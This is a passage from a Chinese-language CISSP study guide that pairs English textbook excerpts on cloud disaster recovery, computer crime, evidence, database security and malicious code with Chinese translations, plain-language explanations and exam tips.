这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 182 / PDF P1576

第 1576 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

disaster recovery capabilities within their cloud environment using controls offered by the cloud service provider, built internally, or offered by third parties.

中文直译 / 整理

在其云环境中,利用云服务提供商提供的控制措施、内部构建的控制措施 或第三方提供的控制措施实现灾难恢复能力。

小白解释

场景先行:你是公司的安全负责人,正在读第 1576 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1576 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 183 / PDF P1577

第 1577 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 19: Investigations and Ethics 1. The major categories of computer crime are military/intelligence attacks, business attacks, financial attacks, terrorist attacks, grudge attacks, thrill attacks, and hacktivist attacks. 2. Thrill attacks are motivated by individuals seeking to achieve the “high” associated with successfully breaking into a computer system. 3. Interviews are conducted with the intention of gathering information from individuals to assist with your investigation. Interrogations are conducted with the intent of gathering evidence from suspects to be used in a criminal prosecution. 4. To be admissible, evidence must be reliable, competent, and material to the case.

中文直译 / 整理

第19章:调查与伦理 1. 计算机犯罪的主要类别包括军事/情报攻击、商业攻击、金融攻击、恐怖主 义攻击、泄愤攻击、刺激攻击和黑客行动主义攻击。 2. 刺激攻击是由那些寻求获得成功入侵计算机系统后所带来“快感”的个人所 驱动的。 3. 访谈旨在从个人那里收集信息,以协助您的调查; 讯问则旨在从嫌疑人那 里收集证据,用于刑事起诉。 4. 为使证据具有可采性,必须具备可靠性、适当性并与案件相关。

小白解释

场景先行:你是公司的安全负责人,正在读第 1577 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1577 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 184 / PDF P1578

第 1578 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 20: Software Development Security 1. The primary key uniquely identifies each row in the table. For example, an employee identification number might be the primary key for a table containing information about employees. 2. Polyinstantiation is a database security technique that appears to permit the insertion of multiple rows sharing the same uniquely identifying information. 3. Supervised and unsupervised machine learning techniques both use training datasets to develop models, but they differ in the nature and use of those training datasets.

In supervised techniques, the instances use labeled data that contains the correct answers that the model should learn how to apply to future instances. In unsupervised techniques, the data is not labeled and the algorithm is asked to identify those labels as part of the learning process.

中文直译 / 整理

第20章:软件开发安全 1. 主键唯一标识表中的每一行。 例如,员工编号可能是包含员工信息的表 的主键。 2. 多实例化是一种数据库安全技术,它看似允许插入多个共享相同唯一标识 信息的行。 3. 监督学习和非监督学习技术都使用训练数据集来构建模型,但它们在训练 数据集的性质和用途上有所不同。 在监督学习中,实例使用带有正确答案的 标注数据,模型应学习如何将这些答案应用于未来的实例。 在非监督学习中, 数据未被标注,算法需要在学习过程中自行识别这些标签。

小白解释

场景先行:你是公司的安全负责人,正在读第 1578 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1578 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 185 / PDF P1579

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Chapter 21: Malicious Code and Application Attacks 1. Viruses and worms both travel from system to system attempting to deliver their malicious payloads to as many machines as possible. However, viruses require human intervention, such as sharing a file, network resource, or email message, to propagate. Worms, on the other hand, seek out vulnerabilities and spread from system to system under their own power, thereby greatly magnifying their reproductive capability, especially in a well-connected network. 2. If possible, antivirus software may try to disinfect an infected file, removing the virus’s malicious code.

If that fails, it might either quarantine the file for manual review or automatically delete it to prevent further infection. 3. Data integrity assurance packages like Tripwire compute hash values for each file stored on a protected system. If a file infector virus strikes the system, this would result in a change in the affected file’s hash value and would therefore trigger a file integrity alert. 4. Defending against SQL injection vulnerabilities requires a defense-indepth approach. It may include the use of whitelisting and/or blacklisting input validation, stored procedures/parameterized queries, web application security scans, web application firewalls, and other controls.

中文直译 / 整理

第21章:恶意代码与应用程序攻击 1. 病毒和蠕虫都会在系统之间传播,试图将恶意负载尽可能多地传递到更 多机器上。 然而,病毒需要人为干预,例如共享文件、网络资源或电子邮 件消息,才能传播。 而蠕虫则会主动寻找漏洞,并在无需人为干预的情况 下自行在系统间传播,从而极大地增强了其繁殖能力,尤其是在网络连接 良好的环境中。 2. 如果可能,杀毒软件会尝试清理被感染的文件,移除病毒的恶意代 码。 如果失败,它可能会将文件隔离以供人工审查,或自动删除文件 以防止进一步感染。 3. 数据完整性保障工具(如Tripwire)会为受保护系统上存储的每个文件计 算哈希值。 如果文件感染型病毒攻击系统,会导致受影响文件的哈希值发生 变化,从而触发文件完整性警报。 4. 防御SQL注入漏洞需要采用纵深防御策略。 这可能包括使用白名单和/或黑 名单输入验证、存储过程/参数化查询、Web应用安全扫描、Web应用防火墙 以及其他控制措施。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

多层控制串联、避免单点失败,就是 defense in depth。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。